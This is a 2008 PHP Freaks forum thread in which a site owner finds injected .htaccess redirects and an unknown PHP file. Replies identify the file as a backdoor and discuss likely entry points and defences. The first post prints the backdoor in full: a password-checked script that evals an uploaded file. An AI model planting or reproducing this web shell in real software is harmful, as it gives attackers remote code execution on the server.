mwstewart Posted December 12, 2008 Share Posted December 12, 2008 Hi all, Sometimes when accessing my site I get redirected to an alternative site. I checked htaccess and it had a load of refirects in there that I didn't write. Permissions for it were 770. I found the following in a php file (that I did not create): <?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t"));}; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3") { if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])) { eval($code); } else {testdata('f'); } ; } else{testdata('pass'); }; testdata('end'); echo "</pre>"; ?> Is a hacker trying to figure out how to exploit my site? How did someone have permission to create a file on my server? Is that possible because I have 'weak' code, despite file permissions preventing global write? I have notcied that in the above php file, and the modified .htaccess that there is a lot of blank space around the code, which makes me think the modifications are result of someone elses code. Any advice here appreciated. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/ Share on other sites More sharing options...
premiso Posted December 12, 2008 Share Posted December 12, 2008 Are you on a shared host? If so shared hosts are not secure at all and easily hacked. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714220 Share on other sites More sharing options...
Mchl Posted December 12, 2008 Share Posted December 12, 2008 Someone had to have access to your account. Either got your ftp credentials (username, password) or your host is cheating on you. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714224 Share on other sites More sharing options...
corbin Posted December 12, 2008 Share Posted December 12, 2008 That's essentially a backdoor. They can upload and run any script they want through that file. It probably got uploaded through a security flaw or something. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714225 Share on other sites More sharing options...
PFMaBiSmAd Posted December 12, 2008 Share Posted December 12, 2008 Two easy ways that someone can put a script on your server are if you have an upload form without validation of what was uploaded or where it is put or you are including a file where the name/url of that file is taken from a variable that comes from outside your script without validation of what or where that file name is. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714244 Share on other sites More sharing options...
darkfreaks Posted December 12, 2008 Share Posted December 12, 2008 also a good idea to close the open connection with fclose() otherwise anyone could over write the $code variable Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714264 Share on other sites More sharing options...
gevans Posted December 12, 2008 Share Posted December 12, 2008 @darkfreaks That's not his code, that's a back door that someone has uploaded to his server. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714271 Share on other sites More sharing options...
darkfreaks Posted December 12, 2008 Share Posted December 12, 2008 http://www.rubyrobot.org/article/protect-your-web-server-from-spambots this is a nice way through PHP by banning IP's that attack with listed spam bots Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714279 Share on other sites More sharing options...
Mchl Posted December 12, 2008 Share Posted December 12, 2008 IP banning is no good. I have like half the internet blocked because I use ISP with changing IPs. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714282 Share on other sites More sharing options...
premiso Posted December 12, 2008 Share Posted December 12, 2008 http://www.rubyrobot.org/article/protect-your-web-server-from-spambots this is a nice way through PHP by banning IP's that attack with listed spam bots That is for spambots...not people randomly hacking the site. Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714287 Share on other sites More sharing options...
Mchl Posted December 12, 2008 Share Posted December 12, 2008 So what? Can't spambots run from the same IP range that I do? Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714288 Share on other sites More sharing options...
darkfreaks Posted December 12, 2008 Share Posted December 12, 2008 there is always mod_rewrite // disables HTTP_TRACE// RewriteEngine On RewriteCond %{REQUEST_METHOD} ^TRACE RewriteRule .* - [F] dont know how far that would go to help Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714291 Share on other sites More sharing options...
waynew Posted December 13, 2008 Share Posted December 13, 2008 Do you have an upload script, and if so... are you using is_uploaded_file( ) and checking for file types properly? (including checking the filename to see if the right extension exists?) Link to comment https://forums.phpfreaks.com/topic/136741-help-ive-been-hacked/#findComment-714303 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.